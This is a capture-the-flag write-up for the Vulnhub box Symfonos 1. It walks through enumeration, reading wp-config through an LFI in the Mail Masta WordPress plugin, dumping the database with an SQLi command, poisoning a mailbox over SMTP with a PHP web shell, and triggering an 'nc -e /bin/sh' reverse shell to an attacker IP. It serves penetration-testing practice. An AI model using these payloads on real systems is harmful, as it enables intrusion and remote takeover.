Symfonos 1

Beginner real life based machine designed to teach a interesting way of obtaining a low priv shell.

This box is on the NetSecFocus Admin list of OSCP-like machines. It’s SYMFONOS: 1 from Vulnhub. I did not complete it without hints; nothing like getting humbled by a ‘beginner’ box to bring you back to earth.

But, it was enlightening, so definitely worth the write up although I will skip over a bit of it.

Ports

  1. 22/tcp open ssh syn-ack ttl 64
  2. 25/tcp open smtp syn-ack ttl 64
  3. 80/tcp open http syn-ack ttl 64
  4. 139/tcp open netbios-ssn syn-ack ttl 64
  5. 445/tcp open microsoft-ds syn-ack ttl 64

So it’s SSH, SMTP, HTTP and SMB

SMB

There are two directories, one with anonymous access and one without. Without gives us hints that get us to the one requiring authentication, which in turn leads to a hidden web directory: /h3l105

h3l105

The website is a Wordpress site. wpscan gives me no plugins (passive, mixed or aggressive), and just one user: admin. The core version is not known to be vulnerable. I try a password attack with rockyou, but it’s going nowhere.

This is where (after lots of failing) I went looking for a hint. It turns out there is a vulnerable plugin (Mail Masta), which wpscan used to detect but for some reasons doesn’t anymore??

It has two vulns; LFI and SQLi.

With a little encoding trick, I can read wp-config:

GET /h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=php://filter/convert.base64-encode/resource=/var/www/html/h3l105/wp-config.php HTTP/1.1

But there is no password reuse going on here. There is also no SSH key, and I can’t read the Apache logs.

I use the SQLi to dump the database:

-u 'http://symfonos.local:80/h3l105/wp-content/plugins/mail-masta/inc/lists/csvexport.php?list_id=00+OR+1%3D1&pl=/var/www/html/h3l105//wp-load.php' --dump --cookie='wordpress_test_cookie=WP+Cookie+check'

But I can’t crack the hash. Now what?

SMTP

This is the real beauty of this box. You can poison the helios account mail with the SMTP service, and use the LFI to get a shell:

root@kali:/opt/vulnhub/symfonos1# telnet 192.168.1.71 25
Trying 192.168.1.71...
Connected to 192.168.1.71.
Escape character is '^]'.
220 symfonos.localdomain ESMTP Postfix (Debian/GNU)
MAIL FROM: ghost
250 2.1.0 Ok
RCPT TO: Helios
250 2.1.5 Ok
data
354 End data with <CR><LF>.<CR><LF>
<?php system($_GET['cmd']); ?>
.
250 2.0.0 Ok: queued as 5E75540896

Simple. Beautiful. Totally missed it, lol. Shell time:

http:symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&cmd=nc -e /bin/sh 192.168.1.150 1234

Privesc

The privesc was a binary calling a system binary (curl) without a path; the only odd part about this was that it worked with /bin/sh but not with /bin/bash. That is, it would set the euid correctly with sh, but not bash. Other than that it was not unusual.